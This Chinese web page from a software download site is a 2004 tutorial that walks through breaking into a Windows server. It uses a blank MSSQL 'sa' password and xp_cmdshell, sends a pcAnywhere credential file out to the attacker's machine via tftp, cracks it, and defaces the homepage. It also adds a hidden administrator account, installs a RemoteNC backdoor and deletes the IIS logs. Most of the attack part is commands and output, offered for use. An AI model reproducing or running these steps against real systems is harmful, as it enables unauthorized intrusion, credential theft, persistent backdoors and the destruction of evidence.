您的位置:首页网络冲浪黑客天空 → SQL 入侵教程

SQL 入侵教程

时间:2004/10/8 16:38:00来源:本站整理作者:蓝点我要评论(0)

    先ping出目标主机的IP地址: 
连接IP主机: 211.154.xxx.xx... 
发送 56 个字节... 
接收到 56 个字节! 历时: 0毫秒 
结论: IP主机正在与Internet连接中... 

  接着选择打开扫描器x-way,选择高级扫描功能。输入目标IP,开始扫描。数分钟后得到扫描结果如下(结果经整理): 

主机信息 
主机名:BEWDB01NOK 
80(HTTP) 
21(FTP Control) 
25(SMTP) 
443(HTTPS) 
1433(MSSQL) 
5631(PCAnyWhere) 
用户列表 
Administrator (Admin) Guest hacker (Admin) IUSR_BEWDB01NOK IWAM_BEWDB01NOK ogilvy remoteuser (Admin) 
漏洞: 
/\../readme.txt (HTTP: 200 ) 
/msadc/msadcs.dll (HTTP: 200 ) 
/iisadmpwd/achg.htr (HTTP: 200 ) 
/_AuthChangeUrl (HTTP: 200 ) 
/?PageServices (HTTP: 200 ) 

  上一步中得到目标服务器的相关有用信息。可以发现扫描结果中并无可用的asp/cgi漏洞。而从所开端口来看, 

21(FTP Control) 
1433(MSSQL) 
5631(PCAnyWhere) 
只有这三个可用。在万一得已的情况下,我是不会用暴力破ftp的。那么只好从 
1433,5631这两个端口入手了!我们知道,1433是ms-sql的服务端口,默认情况下它的最高权限用户帐号SA口令为空。如果管理员疏忽了这一点,没有给SA一个口令的话,事情就好办了!先来试试看。从www.tianxing.org下一个ms-sql的客户端,在Host框中输入目标ip:211.154.xxx.xx 
Username为sa 
password框空,连接: 

SQL>Connecting 211.154.xxx.xx 
SQL>Connected to 211.154.xxx.xx 

  呵呵!看来对方管理员没有对sa设置一个口令!太好了!可以在客户端以xp_cmdshell " "的形式运行任意dos指令了!dir一下试试看: 
SQL>Command: xp_cmdshell "dir c:\" 
驱动器 C 中的卷没有卷标。 
卷的序列号是 5CBD-664C 
卷的序列号是 5CBD-664C 
c:\ 的目录 
c:\ 的目录 
01-12-20 08:13p  2u2u 
01-07-23 08:10p 0 AUTOEXEC.BAT 
01-11-28 04:02p 84 biaoti.txt 
01-07-23 08:10p 0 CONFIG.SYS 
01-11-22 11:49a  InetPub 
01-10-25 11:12a 15,360 kkkk.XLS 
01-07-24 12:09p  MSSQL7 
01-12-12 11:00a 134,217,728 pagefile.sys 
01-11-30 10:59a  Program Files 
01-09-04 02:43p 136 sp_attach.sql 
01-12-20 04:12p  temp 
01-09-27 11:14a  unzipped 
01-12-15 12:09a  WINNT 
13 个文件 134,233,308 字节 
54,232,576 字节可用 
54,232,576 字节可用 
这时我们便可以改对方的主页了!前提是先找到对方的web目录!来找找看 
………… 
XX分钟后,满头大汉,乖乖!竟然有X个盘,每个盘下又有XX个目录,这样找下去得何年何月?不成!要是有windows界面的形式就好找的多了!想想看,目标主机还开着5631端口,这正是pcanywhere远程管理端口呀!取了它的管理帐号和密码不就得了吗?不错的想法,呵呵…… 
默认情况下,pcanywhere安装于c:\Program Files目录下,其data目录下的.cif文件中保存着加密过的连接帐号和密码。只要得到此文件,就可以用一个叫pcanywherepwd的软件快速解出密码! 

且看如何得到这个.cif文件。先用x-way的内置tftp服务器在本机建立tftp服务: 
选择“工具”菜单中的tftp服务器。设置一个默认根目录,点启动即可! 
然后再用ms-sql客户端在目标服务器执行如下指令: 
copy c:\progra~1\pcanywhere\data\New Caller.CIF c:\winnt\system32 
tftp -i 本地ip put New Caller.CIF 
命令执行成功,这个cif文件已被传到本地tftp目录下了! 
此时,用pcanywherepwd.exe破解此文件,得到用户名为:administrator 
密码为:amsrepair 

打开pcanywhere manager建立一个指向211.154.xxx.xx的通道。在setting项中选择network host pc to control or ip adress, 并添上目标ip:211.154.xxx.xx 
选中login information项中的automatically login to host up connection 
并在下面的login name和password栏中添入刚才得到的用户名和密码!确定即可。双击新建立的通道,稍等片刻即可看到了对方桌面。这下好搞了,呵呵~~在 
g:\home\wwweb\目录下,终于找到了他们的index.htm。删!再手动定一个简单的文件: 
 
 
hacked<title> <BR></head> <BR><body> <BR><center> <BR>hacked <BR></center> <BR></body> <BR>保存为:index.htm <BR>修改主页完成。 <BR><BR><BR>该留个后门了,这是个NT主机,用小榕的RemoteNC做后门最好不过了! <BR>先给系统加个超级用户,用ms-sql来做: <BR>net user wing wing /add <BR>net localgroup administrators wing /add <BR><BR>从对方桌面上打开ie连到小榕的站上下载RemoteNC,然后进入命令提示行状态,键入: <BR>RemoteNC 211.154.xxx.xx wing wing LocalSystem "RemoteNC" "Provide Local CMD Redirect" 7 123456 <BR>系统显示: <BR>[Install Service as RunasUser Mode] <BR>Connecting 211.154.xxx.xx ..... Done. <BR>Transffer File ..... Done. <BR>Start Service ..... Done. <BR><BR><BR>Now You can 211.154.xxx.xx to Connect, Have a Joy 安装成功 <BR><BR>这样在任何时候都可以telnet 211.154.xxx.xx 7输入密码:123456即可使用系统任何资源了! <BR><BR>接下来该清理战场了,在ms-sql下停掉对方的ftp和www服务: <BR>net stop msftpsvc <BR>net stop w3svc <BR>删除c:\winnt\sys tem32\logfile下的所有文件。 <BR>再将服务恢复: <BR>net start msftpsvc <BR>net start w3svc </dd> </dl> <div id="xgsp"><p class="tit"><em>相关视频</em></p> <div class="sp-wrap"> <ul class="clearfix"> <li><a href="/video/35627.html" target="_blank"><img src="https://thumb.hzozg.com/n131f33y14414/7ef6220197161773.jpeg"><span>windows10自带扫雷游戏在哪</span></a></li><li><a href="/video/35608.html" target="_blank"><img src="https://thumb12.hzozg.com/n331r1933t6b14n1e13/7ef621f2e386e59b.jpeg"><span>windows11专业版和家庭版的区别</span></a></li><li><a href="/video/35609.html" target="_blank"><img src="https://thumb.hzozg.com/n3319v533e4014eln13/7ef621f2ef964d53.jpeg"><span>windows11家庭版和专业版有什么区别</span></a></li><li><a href="/video/35470.html" target="_blank"><img src="https://thumb2.hzozg.com/n3315vb331dh13emv38/7ef621b17fd6b5e5.jpeg"><span>windows11我的电脑在哪里打开</span></a></li><li><a href="/video/35469.html" target="_blank"><img src="https://thumb12.hzozg.com/n3313eu3330g1365f38/7ef621b16c26f688.jpeg"><span>windows11我的电脑在哪</span></a></li><li><a href="/video/35466.html" target="_blank"><img src="https://thumb10.hzozg.com/n331xf6331dy13drs38/7ef621b10e146fcf.jpeg"><span>win11系统怎么退出微软账号</span></a></li><li><a href="/video/35091.html" target="_blank"><img src="https://thumb10.hzozg.com/n231sp33cd134j22/7ef62061e5f02b61.jpeg"><span>win10ie打开变成edge</span></a></li><li><a href="/video/34798.html" target="_blank"><img src="https://thumb10.hzozg.com/n331zf433u2x1212t36/7ef61efa5c1e0e6e.jpeg"><span>win11怎么设置默认浏览器</span></a></li><li><a href="/video/34683.html" target="_blank"><img src="https://thumb11.hzozg.com/n2317533wl12ji32/7ef61ea73b416974.jpeg"><span>win11 ie浏览器在哪里</span></a></li><li><a href="/video/34071.html" target="_blank"><img src="https://thumb10.hzozg.com/n131032w23h42/7ef61ce5b1bddfd3.jpeg"><span>windows11怎么连接wifi</span></a></li><li><a href="/video/34070.html" target="_blank"><img src="https://thumb10.hzozg.com/n131q32823t42/7ef61ce5a5e38c81.jpeg"><span>windows11有必要升级吗</span></a></li><li><a href="/video/34069.html" target="_blank"><img src="https://thumb10.hzozg.com/n131632l23o42/7ef61ce59b2d938d.jpeg"><span>windows11怎么把我的电脑放在桌面上</span></a></li><li><a href="/video/33644.html" target="_blank"><img src="https://thumb1.hzozg.com/n331j1l32yg223ums26/7ef61b9add7dbd37.jpeg"><span>win10怎么隐藏任务栏</span></a></li><li><a href="/video/33524.html" target="_blank"><img src="https://thumb2.hzozg.com/n331g1e3240e23utf23/7ef61b5b9fbe02f8.jpeg"><span>win10任务栏颜色怎么改</span></a></li><li><a href="/video/33520.html" target="_blank"><img src="https://thumb11.hzozg.com/n331n4m32waz23w6023/7ef61b5b5c19d8a4.jpeg"><span>win10已禁用输入法怎么解决</span></a></li> </ul> </div> </div> <p id="lread"> <b class="tit"><em>相关阅读</em></b> <span> <i><a href="/infoview/Article_181275.html">Windows错误代码大全 Windows错误代码查询</a></i><i><a href="/edu/180591.html">激活windows有什么用</a></i><i><a href="/edu/142370.html">Mac QQ和Windows QQ聊天记录怎么合并 Mac QQ和Windows QQ聊天记录</a></i><i><a href="/infoview/Article_140347.html">Windows 10自动更新怎么关闭 如何关闭Windows 10自动更新</a></i><i><a href="/infoview/Article_136060.html">windows 10 rs4快速预览版17017下载错误问题</a></i><i><a href="/infoview/Article_133896.html">Win10秋季创意者更新16291更新了什么 win10 16291更新内容</a></i><i><a href="/infoview/Article_131339.html">windows10秋季创意者更新时间 windows10秋季创意者更新内容</a></i><i><a href="/infoview/Article_118674.html">kb3150513补丁更新了什么 Windows 10补丁kb3150513是什么</a></i> </span> </p> <dl id="commentBox"><dt class="tit"><i>文章评论</i></dt> <dd id="comment"> <div id="comment-list"> <div id="hotCmt"> </div> <dl> </dl> <p id="cmtNum-wrap"><a href="/comment_18868_1.html">查看所有<span id="cmtNum">0</span>条评论>></a></p> </div> <div id="comment-form"> <form action="/ajax.asp" method="post" id="cmtForm"> <fieldset> <legend>发表评论</legend> <input name="SoftID" type="hidden" id="softID" value="18868" /> <input name="CommentTpye" type="hidden" value="1" /> <input name="Action" type="hidden" value="2" /> <p id="userName-wrap"><input name="UserName" type="text" id="userName" class="input-bg grey9" maxLength="10" value="PC6网友" /></p> <p><textarea name="content" id="cmtMsg" class="input-bor">我来说两句...</textarea></p> <p><button type="submit" class="btn-submit button btnOrg fr" id="subCmt">提交评论</button></p> </fieldset> </form> </div> </dd><!-- #comment end --> </dl> </dt> <dd id="cside"> <div class="adr"></div> <p id="rpj"> <b class="tit"><em>热门文章</em></b> <span> <a href="/infoview/Article_80669.html"><img src="https://thumb10.hzozg.com/up/2015-6/14344446313933179.jpg" /><b>黑客大战直播网址 黑客</b></a> </span> </p> <p id="wj"> <b class="tit"><em>最新文章</em></b> <span> <i><a href="/infoview/Article_80669.html"><img src="https://thumb10.hzozg.com/up/2015-6/14344446313933179.jpg" /><b>黑客大战直播网址 黑客</b></a></i><i><a href="/infoview/Article_51127.html"><img src="https://thumb10.hzozg.com/up/2011-4/20114410101139148440.jpg" /><b>什么是木马,什么是木马</b></a></i> </span> <s> <a href="/infoview/Article_51128.html" target="_blank">计算机病毒是指什么</a><a href="/infoview/Article_51127.html" target="_blank">什么是木马,什么是木马病毒</a><a href="/infoview/Article_48403.html" target="_blank">黑客破解密码常用的方法</a><a href="/infoview/Article_48166.html" target="_blank">告诉你黑客的Google搜索技巧</a> </s> </p> <p id="rwz"> <b class="tit"><em>人气排行</em></b> <span> <i><a href="/infoview/Article_47606.html" target="_blank">如何攻击局域网电脑</a></i><i><a href="/infoview/Article_52423.html" target="_blank">无线网络密码破解教程(破解无线路由WEP加密</a></i><i><a href="/infoview/Article_33378.html" target="_blank">网站获得系统权限攻击教程</a></i><i><a href="/infoview/Article_18851.html" target="_blank">流光破解ftp密码教程</a></i><i><a href="/infoview/Article_51128.html" target="_blank">计算机病毒是指什么</a></i><i><a href="/infoview/Article_48403.html" target="_blank">黑客破解密码常用的方法</a></i><i><a href="/infoview/Article_42172.html" target="_blank">如何命令行/DOS下列出进程名与进程文件路径</a></i><i><a href="/infoview/Article_47496.html" target="_blank">2010黑客工具</a></i> </span> </p> </dd> </dl> <!--#include virtual="/include/footer/news_footer.html"--> <script type="text/javascript"> var _webInfo = {};_webInfo={Username:"网络虫虫",Type:"1",DateTime:"2004/10/8 16:38:00",Id:"18868"};</script> <script type="text/javascript" src="https://www.pc6.com/inc/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="https://www.pc6.com/js/nwz.js"></script> <script type="text/javascript"> var pageClass=7; //读取文章人气 ViewCmsHits('hits',18868); $("#comment-list > dl > dd > p a:last-child").addClass("glBtn"); BindDing("#comment-list > dl > dd > p",18868,1);//顶 </script> <script type="application/ld+json"> { "@context": "https://zhanzhang.baidu.com/contexts/cambrian.jsonld", "@id": "http://www.pc6.com/infoview/Article_18868.html", "title": "SQL 入侵教程 _pc6资讯", "description": ",SQL 入侵教程", "pubDate": "2004-10-08T16:38:00", "upDate": "2004-10-08T16:38:00", "data":{ "WebPage":{ "pcUrl":"http://www.pc6.com/infoview/Article_18868.html", "wapUrl":"https://m.pc6.com/n/18868", "fromSrc":"pc6下载站" } } } </script> </body> </html>